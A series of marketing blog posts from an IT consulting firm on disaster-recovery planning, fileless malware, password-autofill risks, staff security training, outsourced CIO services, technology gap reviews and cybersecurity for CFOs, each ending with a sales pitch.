Disaster recovery audit fail: A few lessons

In talking about disaster recovery plans (DPR), it’s best to illustrate with real-world scenarios to help you understand things better. They offer concrete examples of successes and failures, and you can learn a lot from them. Here’s an example of a DPR audit and the lessons it offers.

Hosting certain types of data and managing a government network legally bind you to maintain DRPs. After an audit of the Michigan Department of Technology and Budget, several failures led to a trove of helpful tips for small- and medium-sized businesses attempting to create a bulletproof disaster recovery plan.

Update and test your plan frequently

What was one of the first and most obvious failures of the department’s DRP? It didn’t include plans to restore an essential piece of their infrastructure — the department’s intranet. Without it, the employees are unable to complete even the most basic of tasks.

The reason for the oversight? The last time the plan was updated was in 2011, leaving out more than six years of IT advancements. If annual revisions sound like too much work, just consider all of the IT upgrades and improvements you’ve made in this year alone. If they’re not accounted for in your plan, you’re destined to fail.

Keep your DRP in an easy-to-find location

It may seem a bit ironic that the best way to store your top-of-the-line business continuity solution is in a binder, but the Michigan Department of Technology and Budget learned the hard way that the alternatives don’t work. Auditors found the DRP stored on the same network it was meant to restore. Which means if something had happened to the network, the plan would be totally inaccessible.

Your company would do well to store electronic copies on more than one network in addition to physical copies around the office and off-site.

Always prepare for a doomsday scenario

The government office made suitable plans for restoring the local area network (LAN), but beyond that, there was no way for employees to get back to work within the 24-hour recovery time objective.

Your organization needs to be prepared for the possibility that there may not be a LAN to go back to. Cloud backups and software are the best way to keep everything up and running when your office is flooded or crushed beneath a pile of rubble.

Your DRP is more than just a pesky legal requirement. It’s the insurance plan that will keep you in business when disaster strikes. Our professionals know the importance of combining both academic and real-world resources to make your plan airtight when either auditors or blizzards strike. Message us today about bringing that expertise to your business.


A closer look at fileless malware

To avoid detection by antimalware programs, cybercriminals are increasingly abusing legitimate software tools and legitimate programs in systems to steal data or ruin its integrity. They use fileless malware to infiltrate trusted applications and issue executables that blend in with normal network traffic or IT/system administration tasks while leaving fewer footprints. Ultimately, your business could be at risk. Let’s see why.

What is fileless malware?

Fileless malware is stored in random access memory (RAM) instead of on the hard drive. In a typical fileless infection, payloads can be injected into the memory of existing software or applications by running scripts within whitelisted or authenticated applications such as PowerShell, which is designed to automate system administration tasks such as view all USB devices, drives, and services installed in the system, schedule a series of demands, or terminate processes (i.e., Task Manager).

Because there are no files to trace, fileless malware escapes detection from most antimalware programs, especially those that use databases of precedents. Furthermore, most automated sensors cannot recognize illicit scripts, and cybersecurity analysts who are trained to identify them usually have a difficult time establishing where to start looking. Fileless malware isn’t as visible compared to traditional malware. They employ a variety of techniques to stay persistent, and can adversely affect the integrity of a business’s process and the infrastructures that run them.

Fileless malware by the numbers

Cybersecurity firm Kaspersky Lab first discovered a type of fileless malware on its very own network a couple of years ago. The final verdict was that it originated from the Stuxnet strain of state-sponsored cyber warfare. The high level of sophistication and government funding meant fileless malware was virtually nonexistent until the beginning of 2017.

In November 2016, attacks using fileless malware saw an uptick of 13% according to a report. In the same quarter, attacks surged 33% compared to the first quarter. During the first quarter of 2017, more PowerShell-related attacks were reported on more than 12,000 unique machines.

Kaspersky Lab uncovered over 140 infections across 40 different countries. Almost every instance of the fileless malware was found in financial institutions and worked towards obtaining login credentials. In the worst cases, infections had already gleaned enough information to allow cyberattackers to withdraw undisclosed sums of cash from ATMs.

In 2018, cybersecurity firm Trend Micro detected a rising trend of fileless threats throughout the first half of the year.

Is your business at risk?

It is unlikely your business would have been targeted in the earliest stages of this particular strain of malware, but it’s better to be safe than sorry. Businesses should practice defense in depth, where multilayered safeguards are implemented to reduce exposure and mitigate damage. But apart from cultivating a security-aware workforce, what actionable countermeasures can organizations do?

While your business might not be in immediate danger, you should employ solutions that analyze trends in behavior. It is also wise to invest in a managed service provider that offers 24/7 network monitoring, proper patches, and software updates. Call today to get started.

The dangers of autocomplete passwords

Hackers have found a new way to track you online. Aside from using advertisements and suggestions, they can now use autocomplete passwords to track you down. Feeling unsecure? Here are some ways to keep you out of harm’s way.

Why auto-fill passwords are so dangerous

As of December 2018, there are 4.1 billion internet users in the world. This means users have to create dozens of passwords, either to protect their account or simply to meet the password-creation requirements of the platform they’re using. Unfortunately, only 20% of US internet users have different passwords for their multiple online accounts.
Certain web browsers have integrated a mechanism that enables usernames and passwords to be automatically entered into a web form. On the other hand, password manager applications have made it easy to access login credentials. But these aren’t completely safe.
Tricking a browser or password manager into giving up this saved information is incredibly simple. All a hacker needs to do is place an invisible form on a compromised webpage to collect users’ login information.

Using auto-fill to track users

For over a decade, there’s been a password security tug-of-war between hackers and cybersecurity professionals. Little do many people know that shrewd digital marketers also use password auto-fill to track user activity.

Digital marketing groups AdThink and OnAudience have been placing these invisible login forms on websites to track the sites that users visit. They’ve made no attempts to steal passwords, but security professionals said it wouldn’t have been hard for them to do. AdThink and OnAudience simply tracked people based on the usernames in hidden auto-fill forms and sold the information they gathered to advertisers.

One simple security tip for today

A quick and effective way to improve your account security is to turn off auto-fill in your web browser. Here’s how to do it:

  • If you’re using Chrome – Open the Settings window, click Advanced, and select the appropriate settings under Manage Passwords.
  • If you’re using Firefox – Open the Options window, click Privacy, and under the History heading, select “Firefox will: Use custom settings for history.” In the new window, disable “Remember search and form history.”
  • If you’re using Safari – Open the Preferences window, select the Auto-fill tab, and turn off all the features related to usernames and passwords.

This is just one small thing you can do to keep your accounts and the information they contain safe. For managed, 24×7 cybersecurity assistance that goes far beyond protecting your privacy, call us today.

Why end user training is critical to your association’s CyberSecurity

October is National CyberSecurity Awareness Month and it’s a perfect time to review your association’s security procedures—starting with employee education. An organization could spend hundreds of thousands of dollars on deploying top-notch CyberSecurity tools but without proper training of end users, it’s useless.

Educating staff on the “why” of CyberSecurity is critical. Employees need to understand the potential risks of a cyber-attack—from financial damage to layoffs to a ruined reputation.

Many of you have heard the term “social engineering” but you might not understand it’s meaning. Social engineering is one of the most common scams encountered by employees. This type of attack uses manipulation and human psychology to trick people into making bad decisions. But as a CFO or financial executive, what can you do to help?

Providing employees with real-world examples of social engineering is one of the best ways to educate and train them to spot these scams before they become a problem:

  • “Microsoft” calling because a machine isn’t updated
  • “IT department” calling to reset your password
  • Company’s “CEO” sends an email to the controller asking to wire funds
  • A USB flash drive is found on the floor

If your association doesn’t have the right CyberSecurity policies and procedures in place, hiring a professional can help you start building a protection program. By blending technology, training, and a common-sense setup, CFO’s can lessen their organization’s chance of encountering a cyber-attack and being compromised.

The original article appeared in Association Trends. Click HERE to view the blog.

Do you need a CIO?

(Hint: YES!)

What is the job of a CIO, exactly? Chief Information Officer. Isn’t that just IT?

Well, yes. And, no.

A CIO has many roles in an organization. IT is one role— understanding computer systems, networking, SaaS, security, standards, etc., has to be in a CIO’s wheelhouse. However, a CIO has to be able to understand and articulate the context of these systems. What do they do for our organization? How are they used? And most importantly, why are we using them?

CIOs manage IT resources and IT-related business resources. Policy preparation, strategic business planning, budgeting, resourcing, training, security, expenditures, damage control, project management— all come under the purview of a CIO, and that CIO has to be able to communicate in a human language to all sorts of people, technical and non-technical, staff, Board, vendors, executives, and members.

In essence, the CIO is the bridge between the technical and business aspects of an organization’s IT requirements. And, yes, you need one!

Well, I don’t have anyone on staff who can fill that position,” you might say.  There are alternatives to hiring an FTE CIO. Outsourcing the CIO function is a popular option.  designDATA offers “fractional” CIO consulting services, bringing our consultants’ expertise and years of association management to the task on an ongoing retainer basis. We work with your organization to identify your IT-related business needs. Big IT questions and small ones, we can help you make decisions around how best to achieve the best results.

Contact for more info.

Why Look for Trouble? Doing a Technology Gap Review

“But I’ve got managed IT services, a great help desk, and my servers are safely in the private cloud. Why would I need to do a Technology Gap Review?”

It’s a good question.  And the answer is another question:  Now that you’ve got your infrastructure all taken care of with designDATA’s help, what about the 43 other pieces of software you’re using to manage your organization? Are they all serving your mission and supporting your goals?

A Technology Gap Review takes a look at how you do business using technology. Not which buttons you push, but what pieces of software you use and how you use them.  Typically, after a review, you see surprises (or not!) such as:

  • Staff are not using the Association Management System (AMS) or CRM to its full functionality— probably because they haven’t been properly trained or retrained.
  • A lot of people have data important to the organization stored in spreadsheets—only.
  • Different departments are using different software to complete the same function, i.e., Constant Contact, Real Magnet, and MailChimp for broadcast emails— and you’re paying for all three.
  • Everybody has their own place to store documents outside the system, like DropBox, or, OneDrive, etc.— which means the organization has no control over them.
  • Someone is manually creating invoices in Word because they can’t get what they need out of a system— and these are not tracked in any automated system until payment is received.

You may suspect all of the above and more. A Technology Gap Review gives you an opportunity to confirm this and discover other gaps.  Steps in a review should include:

  • Interviews with staff in all functional areas of the organization.
  • Documentation of how business is conducted and what is being used to get the job done.
  • Documented full system inventory of what software the organization is using, how and why.

Once you know what you’re dealing with, you are in a better place to decide how to improve performance and function to support your organization’s mission.


designDATA offers Technology Gap Review and CIO Consulting to help your organization with this truly useful exercise. The designDATA Consulting Team is made up of former association/non-profit executives and managers who have been “in the trenches” and understand the unique challenges faced in the industry. We can help you with the process and documentation, and together we can construct a set of recommendations for your organization to move ahead with improvements to functionality.

Contact today for more information, and be sure to ask about how else your designDATA Consulting Team can help you with business management IT issues.

Cybersecurity and Today’s CFO

CFOs can no longer respond with “that’s not my department” when it comes to cybersecurity. In a recent article by Harvard Business Review, CFOs were outed for not taking an active role in their organization’s cybersecurity efforts. Today’s financial executive must focus on more than managing financial risk—they must become an engaged member of the security team.

Data breaches are extremely damaging, costing executives their jobs, destroying brands and causing vital information to be lost. CFOs need to start becoming more competent in cybersecurity methods and implementing practical solutions for keeping data safe and managing risk.

To start building a cybersecurity plan, schedule a free onsite consultation with us to discuss performing a penetration and vulnerability test for your organization. This assessment will help you identify holes in your defenses and uncover areas that hackers can exploit and access critical data. Using the results of these tests, we can work together to fix existing issues and create a cybersecurity plan that protects your people, processes and data.

This article was written for Association TRENDS. Check out the original posting HERE.